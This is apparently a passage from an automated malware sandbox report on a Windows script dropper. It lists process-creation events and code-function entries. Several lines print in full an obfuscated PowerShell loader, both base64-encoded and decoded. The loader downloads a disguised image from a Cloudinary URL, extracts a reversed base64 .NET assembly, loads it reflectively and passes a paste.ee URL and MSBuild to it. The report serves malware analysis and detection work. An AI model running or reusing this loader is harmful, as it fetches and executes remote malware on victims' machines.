8AbABhAHAAcwBvACAALQBnAHQAIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYwBvAG4AdABlAG4AaABvACAAKwA9ACAAJAB4AGEAcQB1AGUAYwBhAC4ATABlAG4AZwB0AGgAOwAkAHEAdQBpAG4AYQBsACAAPQAgACQAYwBvAGwAYQBwAHMAbwAgAC0AIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYQBsAG0AZQBpAGQAaQBuAGEAIAA9ACAAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAYwBvAG4AdABlAG4AaABvACwAIAAkAHEAdQBpAG4AYQBsACkAOwAkAGIAdQBiAGUAbABhACAAPQAgAC0AagBvAGkAbgAgACgAJABhAGwAbQBlAGkAZABpAG4AYQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAYQBsAG0AZQBpAGQAaQBuAGEALgBMAGUAbgBnAHQAaAApAF0AOwAkAGEAZABqAHUAdABvAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgB1AGIAZQBsAGEAKQA7ACQAcABhAGQAcgBhAHMAdABvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGEAZABqAHUAdABvAHIAKQA7ACQAbQBhAG4AZAB1AGMAYQByACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAH
                  Suspicious powershell command line found
                  Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $zooiatrologia = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGEAZAByAGkAZwBhAGwAZQB0AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJAByAGUAbABhAHQAYQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAZAByAG8AIAA9ACAAJAByAGUAbABhAHQAYQByAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AYQBkAHIAaQBnAGEAbABlAHQAZQApADsAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABhAGQAcgBvACkAOwAkAHgAYQBxAHUAZQBjAGEAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGIAcgBpAG0AIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAYwBvAG4AdABlAG4AaABvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAeABhAHEAdQBlAGMAYQApADsAJABjAG8AbABhAHAAcwBvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAYgByAGkAbQApADsAJABjAG8AbgB0AGUAbgBoAG8AIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABjAG8AbABhAHAAcwBvACAALQBnAHQAIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYwBvAG4AdABlAG4AaABvACAAKwA9ACAAJAB4AGEAcQB1AGUAYwBhAC4ATABlAG4AZwB0AGgAOwAkAHEAdQBpAG4AYQBsACAAPQAgACQAYwBvAGwAYQBwAHMAbwAgAC0AIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYQBsAG0AZQBpAGQAaQBuAGEAIAA9ACAAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAYwBvAG4AdABlAG4AaABvACwAIAAkAHEAdQBpAG4AYQBsACkAOwAkAGIAdQBiAGUAbABhACAAPQAgAC0AagBvAGkAbgAgACgAJABhAGwAbQBlAGkAZABpAG4AYQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAYQBsAG0AZQBpAGQAaQBuAGEALgBMAGUAbgBnAHQAaAApAF0AOwAkAGEAZABqAHUAdABvAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgB1AGIAZQBsAGEAKQA7ACQAcABhAGQAcgBhAHMAdABvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEw
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = New-Object System.Net.WebClient;$adro = $relatar.DownloadData($madrigalete);$oftalmoxise = [System.Text.Encoding]::UTF8.GetString($adro);$xaqueca = '<<BASE64_START>>';$brim = '<<BASE64_END>>';$contenho = $oftalmoxise.IndexOf($xaqueca);$colapso = $oftalmoxise.IndexOf($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.Length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.Substring($contenho, $quinal);$bubela = -join ($almeidina.ToCharArray() | ForEach-Object { $_ })[-1..-($almeidina.Length)];$adjutor = [System.Convert]::FromBase64String($bubela);$padrasto = [System.Reflection.Assembly]::Load($adjutor);$manducar = [dnlib.IO.Home].GetMethod('VAI');$manducar.Invoke($null, @('0/VAfz5/r/ee.etsap//:sptth', 'symposiarcha', 'symposiarcha', 'symposiarcha', 'MSBuild', 'symposiarcha', 'symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','1','symposiarcha'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                  Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $zooiatrologia = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGEAZAByAGkAZwBhAGwAZQB0AGUAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJAByAGUAbABhAHQAYQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAZAByAG8AIAA9ACAAJAByAGUAbABhAHQAYQByAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AYQBkAHIAaQBnAGEAbABlAHQAZQApADsAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABhAGQAcgBvACkAOwAkAHgAYQBxAHUAZQBjAGEAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGIAcgBpAG0AIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAYwBvAG4AdABlAG4AaABvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAeABhAHEAdQBlAGMAYQApADsAJABjAG8AbABhAHAAcwBvACAAPQAgACQAbwBmAHQAYQBsAG0AbwB4AGkAcwBlAC4ASQBuAGQAZQB4AE8AZgAoACQAYgByAGkAbQApADsAJABjAG8AbgB0AGUAbgBoAG8AIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABjAG8AbABhAHAAcwBvACAALQBnAHQAIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYwBvAG4AdABlAG4AaABvACAAKwA9ACAAJAB4AGEAcQB1AGUAYwBhAC4ATABlAG4AZwB0AGgAOwAkAHEAdQBpAG4AYQBsACAAPQAgACQAYwBvAGwAYQBwAHMAbwAgAC0AIAAkAGMAbwBuAHQAZQBuAGgAbwA7ACQAYQBsAG0AZQBpAGQAaQBuAGEAIAA9ACAAJABvAGYAdABhAGwAbQBvAHgAaQBzAGUALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAYwBvAG4AdABlAG4AaABvACwAIAAkAHEAdQBpAG4AYQBsACkAOwAkAGIAdQBiAGUAbABhACAAPQAgAC0AagBvAGkAbgAgACgAJABhAGwAbQBlAGkAZABpAG4AYQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAYQBsAG0AZQBpAGQAaQBuAGEALgBMAGUAbgBnAHQAaAApAF0AOwAkAGEAZABqAHUAdABvAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgB1AGIAZQBsAGEAKQA7ACQAcABhAGQAcgBhAHMAdABvACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$madrigalete = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$relatar = New-Object System.Net.WebClient;$adro = $relatar.DownloadData($madrigalete);$oftalmoxise = [System.Text.Encoding]::UTF8.GetString($adro);$xaqueca = '<<BASE64_START>>';$brim = '<<BASE64_END>>';$contenho = $oftalmoxise.IndexOf($xaqueca);$colapso = $oftalmoxise.IndexOf($brim);$contenho -ge 0 -and $colapso -gt $contenho;$contenho += $xaqueca.Length;$quinal = $colapso - $contenho;$almeidina = $oftalmoxise.Substring($contenho, $quinal);$bubela = -join ($almeidina.ToCharArray() | ForEach-Object { $_ })[-1..-($almeidina.Length)];$adjutor = [System.Convert]::FromBase64String($bubela);$padrasto = [System.Reflection.Assembly]::Load($adjutor);$manducar = [dnlib.IO.Home].GetMethod('VAI');$manducar.Invoke($null, @('0/VAfz5/r/ee.etsap//:sptth', 'symposiarcha', 'symposiarcha', 'symposiarcha', 'MSBuild', 'symposiarcha', 'symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','symposiarcha','1','symposiarcha'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_02D51EC2 push 49D01C01h; retf 0_2_02D51F28
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_02D61253 pushad ; iretd 0_2_02D6125B
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_02D4FE65 push cs; iretd 0_2_02D4FE67
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_02D6126E pushad ; iretd 0_2_02D6126F
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_02D51A2E push edx; retf 0_2_02D51A33
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_02D60B2C push eax; ret 0_2_02D60B2E
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_02D58CEB push ebx; retf 0_2_02D58CEC
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_02D52480 push D15B7034h; iretd 0_2_02D52485
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_02D5199D pushad ; iretd 0_2_02D519A4
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_02D509A6 push ebx; retf 0_2_02D509A7
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_0000023761C33062 push eax; ret 0_2_0000023761C33064
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_0000023761C243F8 push 49D01C01h; retf 0_2_0000023761C2445E
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_0000023761C2239B push cs; iretd 0_2_0000023761C2239D
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_0000023761C337A4 pushad ; iretd 0_2_0000023761C337A5
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_0000023761C23F64 push edx; retf 0_2_0000023761C23F69
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_0000023761C33789 pushad ; iretd 0_2_0000023761C33791
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_0000023761C22EDC push ebx; retf 0_2_0000023761C22EDD
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_0000023761C23ED3 pushad ; iretd 0_2_0000023761C23EDA
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_0000023761C2CE18 push 00000046h; iretd 0_2_0000023761C2CE14
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_0000023761C2B221 push ebx; retf 0_2_0000023761C2B222
                  Source: C:\Windows\System32\wscript.exeCode function: 0_2_0000023761C249B6 push D15B7034h; iretd 0_2_0000023761C249BB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00401833 push ebp; iretd 9_2_00401834
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040508F push ecx; iretd 9_2_00405093
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004048A6 push ecx; retf 9_2_004048B2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00418968 push es; iretd 9_2_0041896F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004031F0 push eax; ret 9_2_004031F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00408240 push ebx; iretd 9_2_0040824E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_004142B5 push ebx; retf 9_2_004142B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00417378 push cs; retf 9_2_004173AC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00414308 push DCF7C235h; retn DCF7h9_2_004143BD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040430B push ss; ret 9_2_0040430D
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
